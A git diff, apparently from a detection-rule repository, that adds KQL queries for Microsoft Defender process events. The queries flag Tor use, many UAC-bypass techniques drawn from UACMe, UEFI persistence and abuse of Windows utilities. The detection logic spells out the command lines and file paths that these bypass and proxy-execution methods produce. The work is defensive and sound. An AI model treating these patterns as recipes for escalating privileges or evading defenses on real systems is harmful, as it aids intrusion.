+++ b/KQL/rules/windows/process_creation/tor_client_browser_execution.kql
@@ -0,0 +1,10 @@
+// Title: Tor Client/Browser Execution
+// Author: frack113
+// Date: 2022-02-20
+// Level: high
+// Description: Detects the use of Tor or Tor-Browser to connect to onion routing networks
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1090.003
+
+DeviceProcessEvents
+| where ProcessVersionInfoFileDescription =~ "Tor Browser" or ProcessVersionInfoProductName =~ "Tor Browser" or (FolderPath endswith "\\tor.exe" or FolderPath endswith "\\Tor Browser\\Browser\\firefox.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/trustedpath_uac_bypass_pattern.kql b/KQL/rules/windows/process_creation/trustedpath_uac_bypass_pattern.kql
new file mode 100644
index 00000000..a79e662c
--- /dev/null
+++ b/KQL/rules/windows/process_creation/trustedpath_uac_bypass_pattern.kql
@@ -0,0 +1,10 @@
+// Title: TrustedPath UAC Bypass Pattern
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-08-27
+// Level: critical
+// Description: Detects indicators of a UAC bypass method by mocking directories
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1548.002
+
+DeviceProcessEvents
+| where FolderPath contains "C:\\Windows \\System32\\" or FolderPath contains "C:\\Windows \\SysWOW64\\"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/uac_bypass_abusing_winsat_path_parsing_process.kql b/KQL/rules/windows/process_creation/uac_bypass_abusing_winsat_path_parsing_process.kql
new file mode 100644
index 00000000..6830eaf5
--- /dev/null
+++ b/KQL/rules/windows/process_creation/uac_bypass_abusing_winsat_path_parsing_process.kql
@@ -0,0 +1,10 @@
+// Title: UAC Bypass Abusing Winsat Path Parsing - Process
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-08-30
+// Level: high
+// Description: Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceProcessEvents
+| where (ProcessIntegrityLevel in~ ("High", "System", "S-1-16-16384", "S-1-16-12288")) and InitiatingProcessCommandLine contains "C:\\Windows \\system32\\winsat.exe" and InitiatingProcessFolderPath endswith "\\AppData\\Local\\Temp\\system32\\winsat.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/uac_bypass_tools_using_computerdefaults.kql b/KQL/rules/windows/process_creation/uac_bypass_tools_using_computerdefaults.kql
new file mode 100644
index 00000000..50fe22f4
--- /dev/null
+++ b/KQL/rules/windows/process_creation/uac_bypass_tools_using_computerdefaults.kql
@@ -0,0 +1,10 @@
+// Title: UAC Bypass Tools Using ComputerDefaults
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-08-31
+// Level: high
+// Description: Detects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceProcessEvents
+| where (FolderPath =~ "C:\\Windows\\System32\\ComputerDefaults.exe" and (ProcessIntegrityLevel in~ ("High", "System", "S-1-16-16384", "S-1-16-12288"))) and (not((InitiatingProcessFolderPath contains ":\\Windows\\System32" or InitiatingProcessFolderPath contains ":\\Program Files")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/uac_bypass_using_changepk_and_slui.kql b/KQL/rules/windows/process_creation/uac_bypass_using_changepk_and_slui.kql
new file mode 100644
index 00000000..ef418a7b
--- /dev/null
+++ b/KQL/rules/windows/process_creation/uac_bypass_using_changepk_and_slui.kql
@@ -0,0 +1,10 @@
+// Title: UAC Bypass Using ChangePK and SLUI
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-08-23
+// Level: high
+// Description: Detects an UAC bypass that uses changepk.exe and slui.exe (UACMe 61)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceProcessEvents
+| where FolderPath endswith "\\changepk.exe" and (ProcessIntegrityLevel in~ ("High", "System", "S-1-16-16384", "S-1-16-12288")) and InitiatingProcessFolderPath endswith "\\slui.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/uac_bypass_using_consent_and_comctl32_process.kql b/KQL/rules/windows/process_creation/uac_bypass_using_consent_and_comctl32_process.kql
new file mode 100644
index 00000000..1fd6ae70
--- /dev/null
+++ b/KQL/rules/windows/process_creation/uac_bypass_using_consent_and_comctl32_process.kql
@@ -0,0 +1,10 @@
+// Title: UAC Bypass Using Consent and Comctl32 - Process
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-08-23
+// Level: high
+// Description: Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceProcessEvents
+| where FolderPath endswith "\\werfault.exe" and (ProcessIntegrityLevel in~ ("High", "System", "S-1-16-16384", "S-1-16-12288")) and InitiatingProcessFolderPath endswith "\\consent.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/uac_bypass_using_disk_cleanup.kql b/KQL/rules/windows/process_creation/uac_bypass_using_disk_cleanup.kql
new file mode 100644
index 00000000..38b2f383
--- /dev/null
+++ b/KQL/rules/windows/process_creation/uac_bypass_using_disk_cleanup.kql
@@ -0,0 +1,10 @@
+// Title: UAC Bypass Using Disk Cleanup
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-08-30
+// Level: high
+// Description: Detects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceProcessEvents
+| where ProcessCommandLine endswith "\"\\system32\\cleanmgr.exe /autoclean /d C:" and (ProcessIntegrityLevel in~ ("High", "System", "S-1-16-16384", "S-1-16-12288")) and InitiatingProcessCommandLine =~ "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/uac_bypass_using_dismhost.kql b/KQL/rules/windows/process_creation/uac_bypass_using_dismhost.kql
new file mode 100644
index 00000000..183dc613
--- /dev/null
+++ b/KQL/rules/windows/process_creation/uac_bypass_using_dismhost.kql
@@ -0,0 +1,10 @@
+// Title: UAC Bypass Using DismHost
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-08-30
+// Level: high
+// Description: Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceProcessEvents
+| where (ProcessIntegrityLevel in~ ("High", "System", "S-1-16-16384", "S-1-16-12288")) and (InitiatingProcessFolderPath contains "C:\\Users\\" and InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\" and InitiatingProcessFolderPath contains "\\DismHost.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/uac_bypass_using_event_viewer_recentviews.kql b/KQL/rules/windows/process_creation/uac_bypass_using_event_viewer_recentviews.kql
new file mode 100644
index 00000000..782dcbbd
--- /dev/null
+++ b/KQL/rules/windows/process_creation/uac_bypass_using_event_viewer_recentviews.kql
@@ -0,0 +1,10 @@
+// Title: UAC Bypass Using Event Viewer RecentViews
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-11-22
+// Level: high
+// Description: Detects the pattern of UAC Bypass using Event Viewer RecentViews
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "\\Event Viewer\\RecentViews" or ProcessCommandLine contains "\\EventV~1\\RecentViews") and ProcessCommandLine contains ">"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/uac_bypass_using_idiagnostic_profile.kql b/KQL/rules/windows/process_creation/uac_bypass_using_idiagnostic_profile.kql
new file mode 100644
index 00000000..fc8d05a7
--- /dev/null
+++ b/KQL/rules/windows/process_creation/uac_bypass_using_idiagnostic_profile.kql
@@ -0,0 +1,10 @@
+// Title: UAC Bypass Using IDiagnostic Profile
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-03
+// Level: high
+// Description: Detects the "IDiagnosticProfileUAC" UAC bypass technique
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceProcessEvents
+| where (ProcessIntegrityLevel in~ ("High", "System", "S-1-16-16384", "S-1-16-12288")) and InitiatingProcessCommandLine contains " /Processid:{12C21EA7-2EB8-4B55-9249-AC243DA8C666}" and InitiatingProcessFolderPath endswith "\\DllHost.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/uac_bypass_using_ieinstal_process.kql b/KQL/rules/windows/process_creation/uac_bypass_using_ieinstal_process.kql
new file mode 100644
index 00000000..1f5ee56e
--- /dev/null
+++ b/KQL/rules/windows/process_creation/uac_bypass_using_ieinstal_process.kql
@@ -0,0 +1,10 @@
+// Title: UAC Bypass Using IEInstal - Process
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-08-30
+// Level: high
+// Description: Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceProcessEvents
+| where FolderPath contains "\\AppData\\Local\\Temp\\" and FolderPath endswith "consent.exe" and (ProcessIntegrityLevel in~ ("High", "System", "S-1-16-16384", "S-1-16-12288")) and InitiatingProcessFolderPath endswith "\\ieinstal.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/uac_bypass_using_msconfig_token_modification_process.kql b/KQL/rules/windows/process_creation/uac_bypass_using_msconfig_token_modification_process.kql
new file mode 100644
index 00000000..7e9d4006
--- /dev/null
+++ b/KQL/rules/windows/process_creation/uac_bypass_using_msconfig_token_modification_process.kql
@@ -0,0 +1,10 @@
+// Title: UAC Bypass Using MSConfig Token Modification - Process
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-08-30
+// Level: high
+// Description: Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceProcessEvents
+| where ProcessCommandLine =~ "\"C:\\Windows\\system32\\msconfig.exe\" -5" and (ProcessIntegrityLevel in~ ("High", "System", "S-1-16-16384", "S-1-16-12288")) and InitiatingProcessFolderPath endswith "\\AppData\\Local\\Temp\\pkgmgr.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/uac_bypass_using_ntfs_reparse_point_process.kql b/KQL/rules/windows/process_creation/uac_bypass_using_ntfs_reparse_point_process.kql
new file mode 100644
index 00000000..a1dc464d
--- /dev/null
+++ b/KQL/rules/windows/process_creation/uac_bypass_using_ntfs_reparse_point_process.kql
@@ -0,0 +1,10 @@
+// Title: UAC Bypass Using NTFS Reparse Point - Process
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-08-30
+// Level: high
+// Description: Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceProcessEvents
+| where (ProcessCommandLine endswith "\\AppData\\Local\\Temp\\update.msu" and ProcessCommandLine startswith "\"C:\\Windows\\system32\\wusa.exe\"  /quiet C:\\Users\\" and (ProcessIntegrityLevel in~ ("High", "System", "S-1-16-16384", "S-1-16-12288"))) or ((ProcessCommandLine contains "C:\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\Temp\\" and ProcessCommandLine contains "\\dismhost.exe {") and FolderPath endswith "\\DismHost.exe" and (ProcessIntegrityLevel in~ ("High", "System")) and InitiatingProcessCommandLine =~ "\"C:\\Windows\\system32\\dism.exe\" /online /quiet /norestart /add-package /packagepath:\"C:\\Windows\\system32\\pe386\" /ignorecheck")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/uac_bypass_using_pkgmgr_and_dism.kql b/KQL/rules/windows/process_creation/uac_bypass_using_pkgmgr_and_dism.kql
new file mode 100644
index 00000000..07e62c6d
--- /dev/null
+++ b/KQL/rules/windows/process_creation/uac_bypass_using_pkgmgr_and_dism.kql
@@ -0,0 +1,10 @@
+// Title: UAC Bypass Using PkgMgr and DISM
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-08-23
+// Level: high
+// Description: Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceProcessEvents
+| where FolderPath endswith "\\dism.exe" and (ProcessIntegrityLevel in~ ("High", "System", "S-1-16-16384", "S-1-16-12288")) and InitiatingProcessFolderPath endswith "\\pkgmgr.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/uac_bypass_using_windows_media_player_process.kql b/KQL/rules/windows/process_creation/uac_bypass_using_windows_media_player_process.kql
new file mode 100644
index 00000000..9debdadf
--- /dev/null
+++ b/KQL/rules/windows/process_creation/uac_bypass_using_windows_media_player_process.kql
@@ -0,0 +1,10 @@
+// Title: UAC Bypass Using Windows Media Player - Process
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-08-23
+// Level: high
+// Description: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceProcessEvents
+| where (FolderPath =~ "C:\\Program Files\\Windows Media Player\\osk.exe" or (FolderPath =~ "C:\\Windows\\System32\\cmd.exe" and InitiatingProcessCommandLine =~ "\"C:\\Windows\\system32\\mmc.exe\" \"C:\\Windows\\system32\\eventvwr.msc\" /s")) and (ProcessIntegrityLevel in~ ("High", "System", "S-1-16-16384", "S-1-16-12288"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/uac_bypass_via_icmluautil.kql b/KQL/rules/windows/process_creation/uac_bypass_via_icmluautil.kql
new file mode 100644
index 00000000..2a2b169a
--- /dev/null
+++ b/KQL/rules/windows/process_creation/uac_bypass_via_icmluautil.kql
@@ -0,0 +1,10 @@
+// Title: UAC Bypass via ICMLuaUtil
+// Author: Florian Roth (Nextron Systems), Elastic (idea)
+// Date: 2022-09-13
+// Level: high
+// Description: Detects the pattern of UAC Bypass using ICMLuaUtil Elevated COM interface
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceProcessEvents
+| where ((InitiatingProcessCommandLine contains "/Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}" or InitiatingProcessCommandLine contains "/Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}") and InitiatingProcessFolderPath endswith "\\dllhost.exe") and (not((FolderPath endswith "\\WerFault.exe" or ProcessVersionInfoOriginalFileName =~ "WerFault.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/uac_bypass_via_windows_firewall_snap_in_hijack.kql b/KQL/rules/windows/process_creation/uac_bypass_via_windows_firewall_snap_in_hijack.kql
new file mode 100644
index 00000000..14419adc
--- /dev/null
+++ b/KQL/rules/windows/process_creation/uac_bypass_via_windows_firewall_snap_in_hijack.kql
@@ -0,0 +1,10 @@
+// Title: UAC Bypass via Windows Firewall Snap-In Hijack
+// Author: Tim Rauch, Elastic (idea)
+// Date: 2022-09-27
+// Level: medium
+// Description: Detects attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548
+
+DeviceProcessEvents
+| where (InitiatingProcessCommandLine contains "WF.msc" and InitiatingProcessFolderPath endswith "\\mmc.exe") and (not(FolderPath endswith "\\WerFault.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/uac_bypass_wsreset.kql b/KQL/rules/windows/process_creation/uac_bypass_wsreset.kql
new file mode 100644
index 00000000..c7cb0138
--- /dev/null
+++ b/KQL/rules/windows/process_creation/uac_bypass_wsreset.kql
@@ -0,0 +1,10 @@
+// Title: UAC Bypass WSReset
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-08-23
+// Level: high
+// Description: Detects the pattern of UAC Bypass via WSReset usable by default sysmon-config
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceProcessEvents
+| where FolderPath endswith "\\wsreset.exe" and (ProcessIntegrityLevel in~ ("High", "System", "S-1-16-16384", "S-1-16-12288"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/uefi_persistence_via_wpbbin_processcreation.kql b/KQL/rules/windows/process_creation/uefi_persistence_via_wpbbin_processcreation.kql
new file mode 100644
index 00000000..7b3939f6
--- /dev/null
+++ b/KQL/rules/windows/process_creation/uefi_persistence_via_wpbbin_processcreation.kql
@@ -0,0 +1,12 @@
+// Title: UEFI Persistence Via Wpbbin - ProcessCreation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-18
+// Level: high
+// Description: Detects execution of the binary "wpbbin" which is used as part of the UEFI based persistence method described in the reference section
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1542.001
+// False Positives:
+//   - Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)
+
+DeviceProcessEvents
+| where FolderPath =~ "C:\\Windows\\System32\\wpbbin.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/uncommon_addinutil_exe_commandline_execution.kql b/KQL/rules/windows/process_creation/uncommon_addinutil_exe_commandline_execution.kql
new file mode 100644
index 00000000..4a68b3dd
--- /dev/null
+++ b/KQL/rules/windows/process_creation/uncommon_addinutil_exe_commandline_execution.kql
@@ -0,0 +1,10 @@
+// Title: Uncommon AddinUtil.EXE CommandLine Execution
+// Author: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri)
+// Date: 2023-09-18
+// Level: medium
+// Description: Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) with uncommon Addinroot or Pipelineroot paths. An adversary may execute AddinUtil.exe with uncommon Addinroot/Pipelineroot paths that point to the adversaries Addins.Store payload.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "-AddInRoot:" or ProcessCommandLine contains "-PipelineRoot:") and (FolderPath endswith "\\addinutil.exe" or ProcessVersionInfoOriginalFileName =~ "AddInUtil.exe")) and (not((ProcessCommandLine contains "-AddInRoot:\"C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VSTA" or ProcessCommandLine contains "-AddInRoot:C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VSTA" or ProcessCommandLine contains "-PipelineRoot:\"C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VSTA" or ProcessCommandLine contains "-PipelineRoot:C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VSTA")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/uncommon_assistive_technology_applications_execution_via_atbroker_exe.kql b/KQL/rules/windows/process_creation/uncommon_assistive_technology_applications_execution_via_atbroker_exe.kql
new file mode 100644
index 00000000..95871c9b
--- /dev/null
+++ b/KQL/rules/windows/process_creation/uncommon_assistive_technology_applications_execution_via_atbroker_exe.kql
@@ -0,0 +1,12 @@
+// Title: Uncommon  Assistive Technology Applications Execution Via AtBroker.EXE
+// Author: Mateusz Wydra, oscd.community
+// Date: 2020-10-12
+// Level: medium
+// Description: Detects the start of a non built-in assistive technology applications via "Atbroker.EXE".
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+//   - Legitimate, non-default assistive technology applications execution
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "start" and (FolderPath endswith "\\AtBroker.exe" or ProcessVersionInfoOriginalFileName =~ "AtBroker.exe")) and (not((ProcessCommandLine contains "animations" or ProcessCommandLine contains "audiodescription" or ProcessCommandLine contains "caretbrowsing" or ProcessCommandLine contains "caretwidth" or ProcessCommandLine contains "colorfiltering" or ProcessCommandLine contains "cursorindicator" or ProcessCommandLine contains "cursorscheme" or ProcessCommandLine contains "filterkeys" or ProcessCommandLine contains "focusborderheight" or ProcessCommandLine contains "focusborderwidth" or ProcessCommandLine contains "highcontrast" or ProcessCommandLine contains "keyboardcues" or ProcessCommandLine contains "keyboardpref" or ProcessCommandLine contains "livecaptions" or ProcessCommandLine contains "magnifierpane" or ProcessCommandLine contains "messageduration" or ProcessCommandLine contains "minimumhitradius" or ProcessCommandLine contains "mousekeys" or ProcessCommandLine contains "Narrator" or ProcessCommandLine contains "osk" or ProcessCommandLine contains "overlappedcontent" or ProcessCommandLine contains "showsounds" or ProcessCommandLine contains "soundsentry" or ProcessCommandLine contains "speechreco" or ProcessCommandLine contains "stickykeys" or ProcessCommandLine contains "togglekeys" or ProcessCommandLine contains "voiceaccess" or ProcessCommandLine contains "windowarranging" or ProcessCommandLine contains "windowtracking" or ProcessCommandLine contains "windowtrackingtimeout" or ProcessCommandLine contains "windowtrackingzorder"))) and (not(ProcessCommandLine contains "Oracle_JavaAccessBridge"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/uncommon_child_process_of_addinutil_exe.kql b/KQL/rules/windows/process_creation/uncommon_child_process_of_addinutil_exe.kql
new file mode 100644
index 00000000..802c5177
--- /dev/null
+++ b/KQL/rules/windows/process_creation/uncommon_child_process_of_addinutil_exe.kql
@@ -0,0 +1,10 @@
+// Title: Uncommon Child Process Of AddinUtil.EXE
+// Author: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri)
+// Date: 2023-09-18
+// Level: medium
+// Description: Detects uncommon child processes of the Add-In deployment cache updating utility (AddInutil.exe) which could be a sign of potential abuse of the binary to proxy execution via a custom Addins.Store payload.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\addinutil.exe" and (not((FolderPath endswith ":\\Windows\\System32\\conhost.exe" or FolderPath endswith ":\\Windows\\System32\\werfault.exe" or FolderPath endswith ":\\Windows\\SysWOW64\\werfault.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/uncommon_child_process_of_appvlp_exe.kql b/KQL/rules/windows/process_creation/uncommon_child_process_of_appvlp_exe.kql
new file mode 100644
index 00000000..6a4b8721
--- /dev/null
+++ b/KQL/rules/windows/process_creation/uncommon_child_process_of_appvlp_exe.kql
@@ -0,0 +1,13 @@
+// Title: Uncommon Child Process Of Appvlp.EXE
+// Author: Sreeman
+// Date: 2020-03-13
+// Level: medium
+// Description: Detects uncommon child processes of Appvlp.EXE
+// Appvlp or the Application Virtualization Utility is included with Microsoft Office. Attackers are able to abuse "AppVLP" to execute shell commands.
+// Normally, this binary is used for Application Virtualization, but it can also be abused to circumvent the ASR file path rule folder
+// or to mark a file as a system file.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.t1218, attack.defense-evasion, attack.execution
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\appvlp.exe" and (not((FolderPath endswith ":\\Windows\\SysWOW64\\rundll32.exe" or FolderPath endswith ":\\Windows\\System32\\rundll32.exe"))) and (not(((FolderPath contains ":\\Program Files\\Microsoft Office" and FolderPath endswith "\\msoasb.exe") or (FolderPath contains ":\\Program Files\\Microsoft Office" and FolderPath endswith "\\MSOUC.EXE") or ((FolderPath contains ":\\Program Files\\Microsoft Office" and FolderPath contains "\\SkypeSrv\\") and FolderPath endswith "\\SKYPESERVER.EXE"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/uncommon_child_process_of_bginfo_exe.kql b/KQL/rules/windows/process_creation/uncommon_child_process_of_bginfo_exe.kql
new file mode 100644
index 00000000..866673e4
--- /dev/null
+++ b/KQL/rules/windows/process_creation/uncommon_child_process_of_bginfo_exe.kql
@@ -0,0 +1,10 @@
+// Title: Uncommon Child Process Of BgInfo.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems), Beyu Denis, oscd.community
+// Date: 2019-10-26
+// Level: medium
+// Description: Detects uncommon child processes of "BgInfo.exe" which could be a sign of potential abuse of the binary to proxy execution via external VBScript
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.005, attack.defense-evasion, attack.t1218, attack.t1202
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\bginfo.exe" or InitiatingProcessFolderPath endswith "\\bginfo64.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/uncommon_child_process_of_defaultpack_exe.kql b/KQL/rules/windows/process_creation/uncommon_child_process_of_defaultpack_exe.kql
new file mode 100644
index 00000000..7ea966da
--- /dev/null
+++ b/KQL/rules/windows/process_creation/uncommon_child_process_of_defaultpack_exe.kql
@@ -0,0 +1,10 @@
+// Title: Uncommon Child Process Of Defaultpack.EXE
+// Author: frack113
+// Date: 2022-12-31
+// Level: medium
+// Description: Detects uncommon child processes of "DefaultPack.EXE" binary as a proxy to launch other programs
+// MITRE Tactic: Defense Evasion
+// Tags: attack.t1218, attack.defense-evasion, attack.execution
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\DefaultPack.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/uncommon_child_process_of_setres_exe.kql b/KQL/rules/windows/process_creation/uncommon_child_process_of_setres_exe.kql
new file mode 100644
index 00000000..7a64a5d5
--- /dev/null
+++ b/KQL/rules/windows/process_creation/uncommon_child_process_of_setres_exe.kql
@@ -0,0 +1,14 @@
+// Title: Uncommon Child Process Of Setres.EXE
+// Author: @gott_cyber, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-12-11
+// Level: high
+// Description: Detects uncommon child process of Setres.EXE.
+// Setres.EXE is a Windows server only process and tool that can be used to set the screen resolution.
+// It can potentially be abused in order to launch any arbitrary file with a name containing the word "choice" from the current execution path.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218, attack.t1202
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where (FolderPath contains "\\choice" and InitiatingProcessFolderPath endswith "\\setres.exe") and (not((FolderPath endswith "C:\\Windows\\System32\\choice.exe" or FolderPath endswith "C:\\Windows\\SysWOW64\\choice.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/uncommon_child_process_spawned_by_odbcconf_exe.kql b/KQL/rules/windows/process_creation/uncommon_child_process_spawned_by_odbcconf_exe.kql
new file mode 100644
index 00000000..d3f06a71
--- /dev/null
+++ b/KQL/rules/windows/process_creation/uncommon_child_process_spawned_by_odbcconf_exe.kql
@@ -0,0 +1,13 @@
+// Title: Uncommon Child Process Spawned By Odbcconf.EXE
+// Author: Harjot Singh @cyb3rjy0t
+// Date: 2023-05-22
+// Level: medium
+// Description: Detects an uncommon child process of "odbcconf.exe" binary which normally shouldn't have any child processes.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.008
+// False Positives:
+//   - In rare occurrences where "odbcconf" crashes. It might spawn a "werfault" process
+//   - Other child processes will depend on the DLL being registered by actions like "regsvr". In case where the DLLs have external calls (which should be rare). Other child processes might spawn and additional filters need to be applied.
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\odbcconf.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/uncommon_child_processes_of_sndvol_exe.kql b/KQL/rules/windows/process_creation/uncommon_child_processes_of_sndvol_exe.kql
new file mode 100644
index 00000000..14855785
--- /dev/null
+++ b/KQL/rules/windows/process_creation/uncommon_child_processes_of_sndvol_exe.kql
@@ -0,0 +1,10 @@
+// Title: Uncommon Child Processes Of SndVol.exe
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-06-09
+// Level: medium
+// Description: Detects potentially uncommon child processes of SndVol.exe (the Windows volume mixer)
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\SndVol.exe" and (not((ProcessCommandLine contains " shell32.dll,Control_RunDLL " and FolderPath endswith "\\rundll32.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/uncommon_extension_shim_database_installation_via_sdbinst_exe.kql b/KQL/rules/windows/process_creation/uncommon_extension_shim_database_installation_via_sdbinst_exe.kql
new file mode 100644
index 00000000..539307b3
--- /dev/null
+++ b/KQL/rules/windows/process_creation/uncommon_extension_shim_database_installation_via_sdbinst_exe.kql
@@ -0,0 +1,11 @@
+// Title: Uncommon Extension Shim Database Installation Via Sdbinst.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-01
+// Level: medium
+// Description: Detects installation of a potentially suspicious new shim with an uncommon extension using sdbinst.exe.
+// Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.t1546.011
+
+DeviceProcessEvents
